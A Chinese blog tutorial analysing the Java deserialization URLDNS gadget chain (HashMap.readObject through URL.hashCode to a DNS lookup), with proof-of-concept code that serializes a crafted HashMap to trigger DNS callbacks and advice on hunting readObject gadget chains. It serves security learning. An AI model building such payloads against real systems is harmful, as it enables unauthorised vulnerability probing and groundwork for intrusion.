java反序列化-URLDNS

已于 2023-04-20 09:13:45 修改
阅读量274 收藏
点赞数
分类专栏: Java安全 文章标签: java Powered by 金山文档
于 2023-02-23 17:50:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GalaxySpaceX/article/details/129185091
版权
本文详细介绍了URLDNS链的原理,通过Java反序列化过程,利用HashMap的readObject方法,结合URL的hashCode函数触发DNS查询。文章展示了如何构建调用链,包括设置HashMap、修改URL的hashCode值以控制DNS查询的执行,并给出了POC代码示例。最后,文章总结了寻找和利用readObject函数来构造攻击链的方法。
摘要由CSDN通过智能技术生成

URLDNS链原理:

之前介绍了java反序列化的基础,这里介绍下urldns链的原理

先介绍下原理,查看ysoserial可以看到urldns使用的调用链为:

 *   Gadget Chain:
 *     HashMap.readObject()
 *       HashMap.putVal()
 *         HashMap.hash()
 *           URL.hashCode()

调用分析

我们就按照这个思路去实现我们的urldns

按照ysoserial的调用链首先需要一个继承了Serializable的函数,这里使用HashMap

然后查看对应的readObject()

可以看到到putVal中调用了hash,再跟进hash方法

跟入hashCode(),这里需要注意,不能直接跟入hashCode方法,因为这里我们key需要使用的是java.net.url,所以需要在URL.java中找到hashCode分析

可以看到这里有个判断,当为-1时直接返回不执行,否则就执行。这里需要注意,一会在测试中要更改,之后跟进hashCode方法中

可以看到最终是通过调用getHostAddress(u)来实现DNS查询的

所以梳理下其实我们真正调用的是URLStreamHandler 中的HashCode中的getHostAddress函数,但是要实现调用就要使用HashMap的readObject来实现入口,之后通过putVal和hash最终成功执行。

代码实现

首先编写简单的通过hashmap实现dns查询

    public static void main(String[] args) throws Exception {
        URL url = new URL("http://www.test123.com");
        url.hashCode();

    }

可以看到成功,证明最终是通过hashcode实现dns查询,这里有个点需要注意在后面要涉及,就是通过反射阻止hashcode成功,因为在反序列还未执行的时候就会执行,会干扰测试结果

    public static void main(String[] args) throws Exception {
        URL url = new URL("http://www.test123.com");
        Field test = Class.forName("java.net.URL").getDeclaredField("hashCode");
        test.setAccessible(true);
        test.set(url,123);
        url.hashCode();
    }

执行后,因为反射将值设置为123,非-1,则不执行查询操作

最终poc

    public static void main(String[] args) throws Exception {
        HashMap hashmap = new HashMap();
        URL url = new URL("http://www.test123.com");

        Field test = Class.forName("java.net.URL").getDeclaredField("hashCode");
        test.setAccessible(true);

        //设置为123后,执行put时不会触发dns查询,不然还未执行反序列化方法就返回dns查询
        test.set(url,123);
        hashmap.put(url,123);

        //执行后将值进行恢复,否则反序列化后不能执行dns查询
        test.set(url,-1);

        try {
            //序列化操作
            FileOutputStream fileOutputStream = new FileOutputStream("urldns.bin");
            ObjectOutputStream outputStream = new ObjectOutputStream(fileOutputStream);

            outputStream.writeObject(hashmap);
            outputStream.close();
            fileOutputStream.close();
            //反序列化操作
            FileInputStream fileInputStream = new FileInputStream("urldns.bin");
            ObjectInputStream inputStream = new ObjectInputStream(fileInputStream);
            inputStream.readObject();
            inputStream.close();
            fileInputStream.close();
        }
        catch (Exception e){
            e.printStackTrace();
        }

执行结果如下

ysoserial使用的是SilentURLStreamHandler方法

由此就简单分析了urldns的调用链。

总结:

最后我们来总结下整个的流程和一些总计

  1. 在实现反序列攻击主要的利用函数为readObject函数,这里就相当一个入口,当我们要实现反序列化攻击的时候,首先要考虑我们要实现什么功能,然后去找能实现这个功能的函数有哪些,然后回溯看是是否有类中的readObject函数中恰好调用了该功能,当然如果里面直接调用了exec那就和中奖一样,直接调用执行就可以了,但是没有哪个代码会这么写,所以我们就要去找调用链。

  1. 这里我们打算实现一个DNSLOG功能来判断这个系统是否存在反序列化漏洞,那么要实现这个功能可以使用getHostAddress函数来实现,之后就可以去找是否有类的readObject函数中包含了这个函数,当然函数的嵌套调用和参数控制的限制,真正好用的其实不多,这里我们参考ysoserial的利用链,我们使用HashMap的readObject函数。

  1. 整个的调用链为HashMap的readObject函数->putVal函数->hash函数->URL的hashCode函数->getHostAddress函数。通过这个调用链就可以成功实现urldns功能的实现。

GalaxySpaceX
关注
专栏目录
java url dns_JAVA反序列化URLDNS链分析
weixin_34093899的博客
02-13 294
前言从之前shiro、fastjson等反序列化漏洞刚曝出的时候,就接触ysoserial的工具利用了,不过这么久都没好好去学习过其中的利用链,这次先从其中的一个可以说是最简单的利用链URLDNS开始学起。分析复制到IDEA中,并导入ysoserial的jar包,当然也可以直接构建生成整个ysoserial项目,然后找到对应的java文件进行调试。先看下整体代码:public class URLD...
JAVA反序列化漏洞-ysoserial-URLDNS链分析
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-29 950
对于进行反序列化漏洞原理的学习,URLDNS这条链比较好理解,对后续学习打个基础,URLDNS也是经常用于验证Java反序列化漏洞是否存在,验证服务主机是否出网等情况,为了后期进一步有效性的利用。让我们开始学习吧!
java反序列化工具
11-21
java反序列化工具,覆盖jboss、weblogic、websphere。
Java反序列化URLDNS
m0_61572518的博客
04-14 2487
序列化代码: import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectOutputStream; import java.lang.reflect.Field; import java.net.URL; import java.util.HashMap; public class UrlDnsClient { public static void main(String[] args)
Java 反序列化
最新发布
sky123博客
09-09 1525
反序列化基础 Java 的序列化(Serialization)和反序列化(Deserialization)是将对象的状态转换为字节流并恢复的过程。这个过程使对象可以保存到文件、通过网络传输或保存到数据库中,并在稍后恢复成对象。 序列化(Serialization):将 Java 对象的状态转换为字节流的过程。这使得对象可以保存到文件、发送到其他 JVM 甚至通过网络传输。 反序列化(Deserialization):将字节流转换回 Java 对象的过程。这允许恢复先前序列化的对象状态。 序列化条件 要使
Java反序列化URLDNS
m0_62466350的博客
05-28 821
URLDNS链是java原生态的一条利用链,通常用于存在反序列化漏洞进行验证的,因为是原生态,不存在什么版本限制。不限制jdk版本,使用Java内置类,对第三方依赖没有要求目标无回显,可以通过DNS请求来验证是否存在反序列化漏洞URLDNS利用链,只能发起DNS请求,并不能进行其他利用这条链路还是比较简单的,通常用于存在反序列化漏洞进行验证的,学好了才能更好的为后面打基础。
[JAVA反序列化] URLDNS
snowlyzz的博客
11-08 859
[Java反序列化]—URLDNS链 分析
109-Java反序列化之ysoserial URLDNS模块分析.pdf
09-20
Java 反序列化之 ysoserial URLDNS 模块分析 Java 反序列化漏洞是 Java 语言中的一种常见漏洞,利用 ysoserial 工具可以对其进行攻击。ysoserial 是一个 Java 反序列化漏洞利用工具,提供了多种 payload,可以对...
Java反序列化入门之URLDNS链1
08-03
本文将深入探讨Java反序列化的基本概念、相关方法、以及如何利用ysoserial工具进行漏洞利用,特别关注URLDNS链的原理和构建。 首先,Java反序列化是指将已序列化的对象数据恢复为原来的对象状态。在Java中,序列化...
Java反序列化-CC2分析
Huangjiazhen711的博客
10-14 209
首先看一下作为跳板的 TransformingComparator 类是怎么调用到利用链的在 TransformingComparator#compare 方法中,调用到了transform 方法去修饰 obj1、obj2 的值。就是这个方法调用到了利用链接着在看一下 PriorityQueue 类是怎么作为入口点去利用的在PriorityQueue#readObject 方法中,将反序列化的数据存放在queue 字段中,之后调用 heapify 方法来对数据进行调整,形成二叉堆。
Java反序列化之ysoserial URLDNS模块分析,java迭代器实现原理
m0_64867092的博客
12-30 217
由于HashMap中重写了writeObject方法,因此在进行序列化操作时,执行的序列化方法是HashMap中的writeObject方法,具体如下: 先执行默认的序列化操作: 接着 遍历HashMap,对HashMap中的key,value进行序列化。 综上所述,梳理下ysoserial payload,URLDNS 序列化的整个过程: 首先 ysoserial 通过反射的方式,根据全限定类名 ysoserial.payloads.URLDNS ,获取对应的Class类对象,
Java反序列化工具.zip
05-31
java反序列化工具;weblogic反序列化工具;jboss反序列化工具。
java反序列化利用工具
07-06
java反序列化 weblogic反序列化
[Java反序列化]—URLDNS
Sentiment的博客
04-14 1275
前言 URLDNS链不能执行命令,但通常作为验证是否存在反序列化漏洞的一种方式,学习反序列化应先从URLDNS说起,因为它链子短、易理解。 ysoserial 再谈URLDNS前,一定要说的一个工具ysoserial,ysoserial集合了各种java反序列化payload,可以说是Java反序列化的一个里程碑 工具使用 ysoserial 源码 ysoserial.jar ysoserial.jar java -jar ysoserial-[version]-all.jar [payload type]
Java反序列化-URLDNS学习
whojoe的博客
07-06 422
Java反序列化-URLDNS学习前言代码分析ysoserial中的利用方式参考文章 前言 在复现漏洞的时候经常使用dnslog来进行测试,当然有一定的局限性,只能在机器出网的时候才可以使用,并且在一些不知道利用链的情况下 使用urldns的利用链来进行打dnslog效果比较好,因为其没有诸多的限制 文章中如果有错误欢迎各位师傅斧正 代码 这里的代码是直接粘贴天下大木头师傅的,后面做学习分析 import java.io.*; import java.lang.reflect.Field; import j
java反序列化URLDNS链学习
dayouzi的博客
04-25 981
1、Java 序列化是指把 Java 对象转换为字节序列的过程。ObjectOutputStream类的 writeObject() 方法可以实现序列化。2、Java 反序列化是指把字节序列恢复为 Java 对象的过程。ObjectInputStream 类的 readObject() 方法用于反序列化
Java代码审计:Java反序列化入门之URLDNS
god_Zeo的安全博客
08-19 1417
0x00 前言 自学Java 代码审计,主要自己一个人学习,有点闭门造车,搜索引擎学习法,但是还是记录一下,也分享一下,也便于将来的总结和反思,如果我能终能学到什么,我也会重新梳理思路,为那些自学者提供一个好的思路,所以有了下面的系列文章java代码审计自学篇。 之前研究了,但是没有整理好,因为有hvv任务,所以推迟了一些,现在赶紧整理发出来。 0x01 Java反序列化介绍 Java反序列化漏洞的产生原因: 简单的说就是,在于开发者在重写 readObject 方法的时候,写入了漏洞代码。 序列化和反序列
java url dns_Java反序列化URLDNS链分析
weixin_42504279的博客
02-24 816
预备知识Java反序列化会调用对应的readobject方法比如我创建一个类test。序列化test类就会调用writeobject方法,反序列化就会调用test类的readobject方法。默认是存在的。可以重写readobject方法链子分析在HashMap中。存在readobject方法。最后会调用hash(key)然后hash(key)又会调用key.hashCode方法而URL类又存在一...
Javaweb安全——反序列化漏洞-URLDNS
weixin_43610673的博客
05-21 532
反序列化- URLDNS链 之前学过一遍Java反序列化漏洞,不过那次是从cc链入手的,当时也看了好久,各种调试才搞明白。这次从调用简单的URLDNS链开始从新捋一遍。 本文SDK为1.8 8u211 URLDNS ysoserial中一个利用链,其触发的结果是一次DNS请求。可用于确认是否存在反序列化漏洞,因为整条链均用Java内置的类构造,对第三方库没有依赖。 先来看看ysoserial当中的实现代码 public class URLDNS implements ObjectPayload<Obj
Java反序列化入门:URLDNS链与ysoserial利用
Java反序列化入门之URLDNS链1讲解了Java序列化与反序列化的基本概念及其潜在的安全风险。在Java中,序列化是一种将对象转换为字节流的过程,以便在网络或存储中持久化数据。当对象被反序列化时,这些字节流被恢复为...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值